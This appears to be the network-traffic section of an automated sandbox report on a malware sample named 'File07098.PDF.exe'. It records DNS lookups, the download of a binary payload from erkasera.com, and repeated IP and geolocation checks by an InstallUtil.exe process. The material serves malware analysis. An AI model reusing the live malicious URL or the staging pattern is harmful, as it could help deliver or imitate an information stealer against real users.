                                                      Oct 30, 2024 07:57:56.531436920 CET49756443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:56.531450033 CET44349756188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:56.531835079 CET44349756188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:56.575413942 CET49756443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:56.589925051 CET49756443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:56.635330915 CET44349756188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:56.729129076 CET44349756188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:56.729209900 CET44349756188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:56.729545116 CET49756443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:56.735805035 CET49756443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:56.739945889 CET4975080192.168.2.5193.122.130.0
                                                      Oct 30, 2024 07:57:56.745343924 CET8049750193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:56.899477959 CET8049750193.122.130.0192.168.2.5
                                                      Oct 30, 2024 07:57:56.901845932 CET49765443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:56.901880980 CET44349765188.114.96.3192.168.2.5
                                                      Oct 30, 2024 07:57:56.902067900 CET49765443192.168.2.5188.114.96.3
                                                      Oct 30, 2024 07:57:56.902276039 CET49765443192.168.2.5188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 07:57:30.790379047 CET | 59482 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 07:57:30.940396070 CET | 53 | 59482 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 07:57:36.420012951 CET | 49466 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 07:57:36.427736044 CET | 53 | 49466 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 07:57:37.343424082 CET | 63838 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 07:57:37.351681948 CET | 53 | 63838 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 07:57:30.790379047 CET | 192.168.2.5 | 1.1.1.1 | 0xb7ee | Standard query (0) | erkasera.com | A (IP address) | IN (0x0001) | false
Oct 30, 2024 07:57:36.420012951 CET | 192.168.2.5 | 1.1.1.1 | 0x50ac | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Oct 30, 2024 07:57:37.343424082 CET | 192.168.2.5 | 1.1.1.1 | 0xb5ec | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 07:57:30.940396070 CET | 1.1.1.1 | 192.168.2.5 | 0xb7ee | No error (0) | erkasera.com | | 188.132.193.46 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 07:57:36.427736044 CET | 1.1.1.1 | 192.168.2.5 | 0x50ac | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 30, 2024 07:57:36.427736044 CET | 1.1.1.1 | 192.168.2.5 | 0x50ac | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 07:57:36.427736044 CET | 1.1.1.1 | 192.168.2.5 | 0x50ac | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 07:57:36.427736044 CET | 1.1.1.1 | 192.168.2.5 | 0x50ac | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 07:57:36.427736044 CET | 1.1.1.1 | 192.168.2.5 | 0x50ac | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 07:57:36.427736044 CET | 1.1.1.1 | 192.168.2.5 | 0x50ac | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 07:57:37.351681948 CET | 1.1.1.1 | 192.168.2.5 | 0xb5ec | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 07:57:37.351681948 CET | 1.1.1.1 | 192.168.2.5 | 0xb5ec | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false

                                                      • erkasera.com
                                                      • reallyfreegeoip.org
                                                      • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 193.122.130.0 | 80 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 07:57:36.441065073 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 30, 2024 07:57:37.132054090 CET | 323 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 06:57:37 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 12ada612d30ee11d429f11b0f23e7967
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 07:57:37.135967016 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 30, 2024 07:57:37.304203033 CET | 323 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 06:57:37 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: f7eabcb33802362db5d7f08c031aabc3
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
Oct 30, 2024 07:57:38.255918980 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 30, 2024 07:57:38.419322968 CET | 323 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 06:57:38 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ac3e9601a3475daeb18a99198bf1ba9a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 193.122.130.0 | 80 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 07:57:39.198014975 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 30, 2024 07:57:39.859971046 CET | 323 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 06:57:39 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 3a67b4b598eb8ff1a70dd23e5c423a28
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49710 | 193.122.130.0 | 80 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 07:57:40.633461952 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 30, 2024 07:57:41.311827898 CET | 323 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 06:57:41 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c01f8f97864759eaf1a777cc0482af5f
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49712 | 193.122.130.0 | 80 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 07:57:42.065803051 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 30, 2024 07:57:42.744299889 CET | 323 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 06:57:42 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 57835a0b2762f8e0b319eca8f94178d1
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49714 | 193.122.130.0 | 80 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 07:57:43.552392006 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 30, 2024 07:57:44.222043037 CET | 323 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 06:57:44 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c534f24b8027ad7773d374ca0201a444
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.5 | 49716 | 193.122.130.0 | 80 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Oct 30, 2024 07:57:44.996670961 CET | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:57:45.688980103 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:45 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 9c4416c1fca664739896e6125eb641c9
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.5 | 49718 | 193.122.130.0 | 80 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Oct 30, 2024 07:57:46.444052935 CET | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:57:47.105513096 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:47 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 18a587a7daa4548f3d8a2e52cc12ca17
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.5 | 49750 | 193.122.130.0 | 80 | 6204 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Oct 30, 2024 07:57:54.852499962 CET | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:57:55.525356054 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:55 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: c4b74c4d7321730c96ac75dad22f0a41
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                      Oct 30, 2024 07:57:55.529294968 CET | 127 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Oct 30, 2024 07:57:55.703931093 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:55 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: aea3030141df3963debc4b9d42b36215
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                      Oct 30, 2024 07:57:55.925192118 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:55 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: aea3030141df3963debc4b9d42b36215
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                      Oct 30, 2024 07:57:56.739945889 CET | 127 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Oct 30, 2024 07:57:56.899477959 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 0178490672a9e8bfcbd368b45cbc4f28
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.5 | 49767 | 193.122.130.0 | 80 | 6204 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Oct 30, 2024 07:57:57.652051926 CET | 127 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Oct 30, 2024 07:57:58.314532995 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:58 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 338b99e9a714468e4bd0705d1c79be16
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.5 | 49779 | 193.122.130.0 | 80 | 6204 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Oct 30, 2024 07:57:59.117760897 CET | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:57:59.778089046 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:59 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: d5c3b35f640cb6647678fefc0494ac21
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      10 | 192.168.2.5 | 49790 | 193.122.130.0 | 80 | 6204 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Oct 30, 2024 07:58:00.548480034 CET | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:58:01.220374107 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:01 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 3b86ad31a155711f9589077a3dc24dbc
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      11 | 192.168.2.5 | 49798 | 193.122.130.0 | 80 | 6204 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Oct 30, 2024 07:58:02.008085012 CET | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:58:02.867974997 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:02 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 45550270ca009c38ddb7ba706e6c0f39
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      12 | 192.168.2.5 | 49810 | 193.122.130.0 | 80 | 6204 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Oct 30, 2024 07:58:03.662055016 CET | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:58:04.333045006 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:04 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: b96d18a4828d846cdb97348c97d22cf2
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      13 | 192.168.2.5 | 49821 | 193.122.130.0 | 80 | 6204 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Oct 30, 2024 07:58:05.133903027 CET | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:58:05.967027903 CET | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 7c32d433eb623386502d5d8a6df729db
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.5 | 49704 | 188.132.193.46 | 443 | 4124 | C:\Users\user\Desktop\File07098.PDF.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-10-30 06:57:32 UTC | 83 | OUT | GET /seuias/Mccudidikm.vdf HTTP/1.1
                                                      Host: erkasera.com
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:32 UTC | 207 | IN | HTTP/1.1 200 OK
                                                      Connection: close
                                                      content-type: application/octet-stream
                                                      last-modified: Tue, 29 Oct 2024 08:54:25 GMT
                                                      accept-ranges: bytes
                                                      content-length: 951304
                                                      date: Wed, 30 Oct 2024 06:57:11 GMT
                                                      Data Ascii: Gw>c(U?0*rSv"0;\e6V]odI+x]e]T`x7Pk6-TbudpbXb_tX!#[c1RX\-^PXW"b?5- =`Cadh*M3R;b1^KST2;yf'$Rkhh{a,/:`P:YFP


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-10-30 06:57:38 UTC | 87 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:38 UTC | 883 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:38 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19481
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
